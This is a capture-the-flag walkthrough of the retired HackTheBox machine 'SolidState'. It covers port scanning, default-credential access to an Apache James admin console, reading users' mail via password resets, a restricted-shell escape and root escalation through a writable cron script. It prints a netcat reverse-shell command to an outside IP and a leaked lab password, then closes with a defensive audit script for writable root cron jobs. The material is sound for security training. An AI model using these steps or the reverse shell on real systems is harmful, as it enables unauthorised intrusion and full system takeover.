HacktheBox.eu - Retired - solidstate
Recon
So I start, as always, with a simple up/down port scan:
nmap -T4 -p- -oX ./nmapb.xml solidstate.htb
Then I convert that to HTML to make it pretty:
xsltproc ./nmapb.xml -o ./nmapb.html
That's a goodly number of open ports:
22,25,80,110,119,4555
Let's scan with nmap again, this time with the -A switch (version detection, OS detection and the default scripts) against those ports:
nmap -T4 -p22,25,80,110,119,4555 -A -oX ./nmapf.xml solidstate.htb
Then I convert that to HTML as well:
xsltproc ./nmapf.xml -o ./nmapf.htm
OK, we've got OpenSSH 7.4.1 on 22, Apache 2.4.25 on 80, and a bunch of stuff that says james($service) on 25, 110, 119 and 4555.
James is a mail server from Apache: the Java Apache Mail Enterprise Server.
So it makes sense to see 25 (smtp), 110 (pop3), 119 (nntp?) and 4555, which is some sort of remote admin for James.
Let's check out port 80.
Exploit
Checking around for vulnerabilities in James I found this:
https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7
It creates a new user and executes code the next time that user logs in…
For grins and giggles, it says the James default admin is root/root.
I opened telnet just to see and…
Cool, root/root works. Let's poke around, starting with the help command to see what we can do.
listusers, let's get some info.
So setpassword is interesting too. We can change a user's password, then log in to their POP account and read their email.
Here is a blog about looking at pop through the command line
https://www.shellhacks.com/retrieve-email-pop3-server-command-line/
The user mindy was the first I tested that had any email in it.
A welcome email and a password:
Username: mindy
Pass: P@55W0rd1!2@
There's also one other email, in John's mailbox.
I wonder if Mindy changed her password as instructed in the email?
Let's see if we can ssh as mindy:
ssh mindy@solidstate.htb
Let's see what is in Mindy's folder.
That was quick.
OK, let's pivot to privilege escalation.
Here is the thing though: mindy is stuck with a restricted shell and can't run a lot of commands, not even change directory.
We need to escape out of this bash hell.
Eventually I tried opening another ssh session that tells bash to ignore the profile:
ssh mindy@solidstate.htb -t "bash --noprofile"
It's uglier, but at least we have some power.
Poking around the OS I found this in /opt:
A script that belongs to root… that we have write access to :)
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')   # wipe everything under /tmp
except:
    sys.exit()
It just goes in and deletes everything in the /tmp folder.
I think this is running on a schedule, because I've already seen some of my tools disappear from /tmp.
So the easy win here is just to change this to dump /root/root.txt out to the /tmp directory, where we can read it:
import os
os.system("cat /root/root.txt > /tmp/root.xt")
Then wait a minute for it to run.
That was easy… but let's get a root shell too, which should be really simple.
Just modify our tmp.py:
import os
os.system("nc -e /bin/bash 10.10.14.18 5555")
And wait for the minute to change.
And here is the job that is running tmp.py.
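The root cause on this box is a root-owned scheduled script that an unprivileged user can write to. As an added example (not part of the original write-up or of the box), here is a small audit check a defender can run over /etc/crontab-style jobs to catch exactly that: it flags any absolute path in a root job's command that is group- or world-writable, or not owned by root. The crontab text and the stat results in the sample are constructed.

```python
import os

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style text; skip blanks, comments, VAR=x."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)   # m h dom mon dow user command
        if len(parts) == 7:
            yield parts[5], parts[6]

def weak_root_job_scripts(crontab_text, stat_func=os.stat):
    """Flag absolute paths in root jobs that are group/other-writable or not owned by uid 0."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in (t for t in command.split() if t.startswith("/")):
            try:
                st = stat_func(path)
            except OSError:           # file absent: nothing writable to report
                continue
            problems = []
            if st.st_mode & 0o022:    # group- or other-writable bit set
                problems.append("writable by group/others")
            if st.st_uid != 0:
                problems.append("not owned by root")
            if problems:
                findings.append((path, command, "; ".join(problems)))
    return findings

# Constructed sample (not from the box): a crontab like the one behind tmp.py,
# with os.stat_result values standing in for the real filesystem.
SAMPLE_CRONTAB = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
                  "*/3 * * * * root python /opt/tmp.py\n"
                  "0 2 * * * root /usr/local/bin/backup.sh\n"
                  "*/5 * * * * mindy /home/mindy/job.sh\n")

def fake_entry(mode, uid):            # (mode, ino, dev, nlink, uid, gid, size, a, m, c)
    return os.stat_result((mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))

SAMPLE_FILES = {"/opt/tmp.py": fake_entry(0o100777, 0),            # world-writable
                "/usr/local/bin/backup.sh": fake_entry(0o100755, 0),
                "/home/mindy/job.sh": fake_entry(0o100777, 1001)}  # not a root job

def fake_stat(path):
    if path not in SAMPLE_FILES:
        raise FileNotFoundError(path)
    return SAMPLE_FILES[path]
```

On a real host, call weak_root_job_scripts(open('/etc/crontab').read()) with the default os.stat; over the sample, only /opt/tmp.py is reported.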